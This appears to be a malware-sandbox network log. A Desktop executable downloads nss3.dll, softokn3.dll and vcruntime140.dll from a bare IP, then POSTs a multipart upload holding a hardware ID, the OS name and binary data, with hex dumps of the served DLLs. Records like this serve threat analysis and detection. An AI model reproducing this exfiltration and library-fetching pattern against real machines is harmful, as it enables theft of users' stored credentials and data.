                                                                                                                                          Apr 28, 2021 22:58:43.190516949 CEST2270OUTGET /nss3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Apr 28, 2021 22:58:44.464139938 CEST3594OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Apr 28, 2021 22:58:44.692892075 CEST3750OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Apr 28, 2021 22:58:49.308279991 CEST3876OUTPOST / HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                          Content-Length: 108331
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Apr 28, 2021 22:58:49.308444977 CEST3891OUTData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66
                                                                                                                                          Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
                                                                                                                                          Apr 28, 2021 22:58:49.381310940 CEST3916OUTData Raw: 8d 50 cf 52 21 12 af 31 d7 73 15 10 b7 1a 9d d8 62 01 4e 5e 05 90 4a 47 5f 26 4c 8e dd 42 f6 0e 23 b1 80 a5 e1 dc 19 e3 d1 a0 01 17 6f eb fb 23 b1 fc 69 94 7a c9 25 c1 ff 55 11 32 8a 96 23 79 2a f4 33 46 23 bf 54 30 73 35 bb ba 8f 18 4c fc ff 6c
                                                                                                                                          Data Ascii: PR!1sbN^JG_&LB#o#iz%U2#y*3F#T0s5LlAGE4j&{N\mZ/m[Jg'A*.s$4-h/c}d=%3[Rm+E9{oOBU4rnozYOl4e#$p9+)uE9d(!G)ig'P
                                                                                                                                          Apr 28, 2021 22:58:49.451502085 CEST3938OUTData Raw: f1 19 4a d9 47 e0 1f fc fd af 7a 5d e3 2b 2c 17 1b 76 04 f0 23 7a c4 4a d6 34 f8 8f 8f eb be ce 67 e7 6e 05 8a ec cb fe d9 aa 79 7e d6 6f 37 da 2c c3 5b d7 7c 4d 78 39 de 13 c9 8a 25 0d 5b e6 87 22 c6 ad a3 43 e1 66 ca 3c 36 9f 1f b2 56 d4 da d4
                                                                                                                                          Data Ascii: JGz]+,v#zJ4gny~o7,[|Mx9%["Cf<6Vv:d"yj8ahY?2;"-{kY5g,"5f.W OWCx^>L(O~k~f0SEsgkenjGo(}E)q5f;>3%Ky
                                                                                                                                          Apr 28, 2021 22:58:49.451551914 CEST3944OUTData Raw: b0 0f 2f e0 a3 46 7f 5e e2 47 ed 2b fe 13 5c 16 c1 e9 7a 54 db eb 08 d1 e4 af e7 fb e2 85 7a 67 3d be 3e 99 9b 07 fc 09 bb b4 de 99 76 a6 51 1e 3d dd 63 78 b5 ab 4b e3 27 54 ed 2d 52 90 0f 55 f9 68 99 6b 36 63 fc 5a 39 c6 96 7b 66 f0 fe 73 b1 37
                                                                                                                                          Data Ascii: /F^G+\zTzg=>vQ=cxK'T-RUhk6cZ9{fs7||b%o{dOxf4|)|\y818@`Iz~-=@uc&mT+3I-5C|k1A%r\{Z_T
                                                                                                                                          Apr 28, 2021 22:58:49.451822996 CEST3952OUTData Raw: cd 31 46 b1 aa 39 e8 31 2a 27 d3 40 a5 53 14 2c 9b 15 70 47 e1 2b fd dd 81 71 95 21 44 66 c7 71 da 8c 58 54 c6 ca 20 ac f6 97 80 fc e7 01 ec fb 37 30 54 5c 37 e5 c3 80 f7 8f e2 85 d1 92 71 1a 33 45 f8 64 b1 3d 57 6b ca db 99 a2 d7 93 e7 09 73 75
                                                                                                                                          Data Ascii: 1F91*'@S,pG+q!DfqXT 70T\7q3Ed=Wksu261x+%;jR+sxH\3pda<dMN4h&ur)hKk%6Ug\Zx7RB A=iVV,4gUI
                                                                                                                                          Apr 28, 2021 22:58:49.452054977 CEST3965OUTData Raw: c1 f4 b9 83 98 50 5f ab e3 a6 a6 3b 79 fc f4 f9 ef 63 9c e4 49 66 41 98 a1 b2 09 93 58 b1 f6 6b 76 9c 91 3a fb dc 1e d9 06 bf 9c c2 27 56 cb 57 46 2a f0 63 0f d7 51 ad de 5a 01 6c 49 8c 51 88 d5 08 c2 14 31 02 82 95 90 7c f1 cf 9a de 4b 83 8c b7
                                                                                                                                          Data Ascii: P_;ycIfAXkv:'VWF*cQZlIQ1|K [P]!tU'q9vp$.7XZ;D_Qb[#^mQ.D+:u8yo*QPDWqeP2J./|$WMm+DUW0FY\A;y9&
                                                                                                                                          Apr 28, 2021 22:58:49.522646904 CEST3983OUTData Raw: 0f a9 0d fb 11 1e f4 84 b9 e0 ef 67 62 2b ec 02 9d f9 b0 a1 99 cf c4 c3 14 ed d4 92 5c 1f 33 3e 5c 75 3d 0c d1 8c 29 68 9b a7 26 64 9d 5e ac be 69 2e e4 7e 07 50 58 93 31 e7 54 88 5b 71 61 e4 7d 63 7d fd 6e 17 67 d1 22 9d 4d bb fb 8b 3a 96 3f 93
                                                                                                                                          Data Ascii: gb+\3>\u=)h&d^i.~PX1T[qa}c}ng"M:?^6s(FyP'i-ZkU%oosJ<8 wP;we/fXo6.9J~yxA;G$anvni7%fqBe G-+GQBZ-OmQxmpe7<UH


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          178.47.81.22680192.168.2.449735C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:58:42.247497082 CEST1278INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
                                                                                                                                          Apr 28, 2021 22:58:42.323343992 CEST1281INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 334288
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "519d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                                                                                          Apr 28, 2021 22:58:42.323370934 CEST1282INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8
                                                                                                                                          Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
                                                                                                                                          Apr 28, 2021 22:58:42.323404074 CEST1283INData Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75
                                                                                                                                          Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
                                                                                                                                          Apr 28, 2021 22:58:42.323438883 CEST1285INData Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b
                                                                                                                                          Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
                                                                                                                                          Apr 28, 2021 22:58:42.323472977 CEST1286INData Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66
                                                                                                                                          Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
                                                                                                                                          Apr 28, 2021 22:58:42.323508978 CEST1288INData Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45
                                                                                                                                          Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
                                                                                                                                          Apr 28, 2021 22:58:42.323542118 CEST1289INData Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41
                                                                                                                                          Data Ascii: U##fK|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
                                                                                                                                          Apr 28, 2021 22:58:42.323577881 CEST1290INData Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8
                                                                                                                                          Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
                                                                                                                                          Apr 28, 2021 22:58:42.323611021 CEST1292INData Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01
                                                                                                                                          Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
                                                                                                                                          Apr 28, 2021 22:58:42.323645115 CEST1293INData Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0
                                                                                                                                          Data Ascii: Q33 ME33x|33EM$(3D3
                                                                                                                                          Apr 28, 2021 22:58:42.393313885 CEST1326INData Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89
                                                                                                                                          Data Ascii: EpM333M3E33M33
                                                                                                                                          Apr 28, 2021 22:58:42.774359941 CEST1664INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 137168
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "217d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                                                                                          Apr 28, 2021 22:58:42.933749914 CEST1808INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 440120
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "6b738-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 